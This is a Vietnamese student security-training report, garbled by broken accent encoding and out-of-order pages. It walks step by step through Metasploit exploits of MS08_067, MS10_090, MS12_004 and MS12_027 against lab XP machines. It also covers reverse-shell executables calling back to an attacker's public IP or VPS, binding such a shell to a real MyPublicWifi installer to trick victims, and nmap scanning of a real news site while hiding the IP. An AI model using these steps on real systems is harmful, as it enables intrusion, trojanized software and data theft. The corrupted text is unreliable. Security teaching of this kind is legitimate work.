Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
7
- Web application analysis loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng trong theo
dotildei giaacutem saacutet caacutec ứng dụng web
- Radio network analysis Để kiểm tra mạng khocircng dacircy bluetooth vagrave nhận dạng tần
số vocirc tuyến (RFID) bạn coacute thể sử dụng caacutec cocircng cụ trong thể loại nagravey
- Penetration loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để khai thaacutec caacutec lỗ hổng
tigravem thấy trong caacutec maacutey tiacutenh mục tiecircu
- Privilege escalation Sau khi khai thaacutec caacutec lỗ hổng vagrave được truy cập vagraveo caacutec maacutey
tiacutenh mục tiecircu bạn coacute thể sử dụng caacutec cocircng cụ trong loại nagravey để nacircng cao đặc quyền
của bạn cho caacutec đặc quyền cao nhất
- Maintaining access Cocircng cụ trong loại nagravey sẽ coacute thể giuacutep bạn trong việc duy trigrave
quyền truy cập vagraveo caacutec maacutey tiacutenh mục tiecircu Bạn coacute thể cần để coacute được những
đặc quyền cao nhất trước khi caacutec bạn coacute thể cagravei đặt cocircng cụ để duy trigrave quyền truy
cập
- Voice Over IP (VOIP) Để phacircn tiacutech VOIP bạn coacute thể sử dụng caacutec cocircng cụ trong thể
loại nagravey
Backtrack cũng coacute những tool sử dụng cho
- Digital forensics Trong loại nagravey bạn coacute thể tigravem thấy một số cocircng cụ coacute thể được sử
dụng để lagravem phacircn tiacutech kỹ thuật như coacute được higravenh ảnh đĩa cứng cấu truacutec caacutec tập
tin vagrave phacircn tiacutech higravenh ảnh đĩa cứng Để sử dụng caacutec cocircng cụ cung cấp trong thể loại
nagravey bạn coacute thể chọn Start Backtrack Forensics trong trigravenh đơn khởi động Đocirci khi
sẽ đogravei hỏi bạn phải gắn kết nội bộ đĩa cứng vagrave caacutec tập tin trao đổi trong chế độ chỉ
đọc để bảo tồn tiacutenh toagraven vẹn
- Reverse engineering Thể loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để gỡ rối
chương trigravenh một hoặc thaacuteo rời một tập tin thực thi
222 Footprinting lagrave gigrave
Footprinting lagrave 1 trong 3 quaacute trigravenh đầu tiecircn magrave hacker sẽ tiến hagravenh nhằm thu thập
thocircng tin của mục tiecircu thocircng qua caacutec cơ sở dữ liệu cocircng khai như caacutec thocircng tin về tecircn
miền của tổ chức danh bạn điện thọai caacutec trang vagraveng doanh nghiệp để tigravem kiếm địa
chỉ số điện thọai địa chỉ email của caacutec bộ phận vv Đacircy lagrave bước rất quan trọng vagrave
caacutec attacker thường dagravenh ra đến 90 thời gian để tiến hagravenh thu thập thocircng tin cograven quaacute
trigravenh tấn cocircng chỉ diễn ra trong 10 trong toagraven bộ quaacute trigravenh Điều nagravey cũng giống như
bước chuẩn bị khi chuacuteng ta cần tiến hagravenh triển khai một cocircng việc nagraveo đoacute trong quaacute trigravenh
8
kinh doanh hay phaacutet triển yacute tưởng mới Thocircng tin cagraveng nhiều thigrave cơ hội tấn cocircng thagravenh
cocircng cagraveng cao Để tiến hagravenh thu thập thocircng tin một caacutech khoa học caacutec hackerattacker
cần thực hiện theo một sơ đồ như sau
1 Tigravem kiếm từ caacutec nguồn thocircng tin
2 Xaacutec định caacutec datildey địa chỉ mạng
3 Xaacutec định caacutec maacutey cograven họat động
4 Tigravem kiếm những port mở (open port) hay điểm truy cập của mục tiecircu (access point)
5 Dograve tigravem hệ điều hagravenh của mục tiecircu
6 Tigravem kiếm caacutec dịch vụ đang họat động trecircn những port mở
7 Lập mocirc higravenh mạng
Thocircng tin tigravem kiếm cần thiết như
1 Network Informations Domain Network blocks IP TCP hay UDP System
Enumeration ACLs IDSes vv
2 System Informations OS user and group name system name kiến truacutec system SNMP
Routing
3 Organziation Informations Tecircn cocircng ty nhacircn viecircn websites địa chỉ số điện thoại
Email liecircn lạc caacutec kiến thức liecircn quan đến tigravenh higravenh kinh doanh của cocircng ty
Trong quaacute trigravenh nagravey Hacker chủ yếu dugraveng caacutec phương tiện thocircng tin cocircng cộng như baacuteo
chiacute internet để tigravem hiểu caacutec thocircng tin hợp phaacutep về mục tiecircu necircn footprinting hầu như khocircng
thể phaacutet hiện vigrave đacircy lagrave hagravenh động hợp phaacutep
223 CAacuteC KIỂU FOOTPRINTING
2231 Passive Footprinting
Passive footprinting lagrave higravenh thức tiềm kiếm thocircng tin thocircng qua bagravei baacuteo trang web những
website hỗ trợ tigravem kiếm như wwwgooglecom wwwtenmienvn
wwwwhoisdomaintoolscom wwwarcchiveorg httpcentralopsnetco
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang webwwwtenmienvn
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
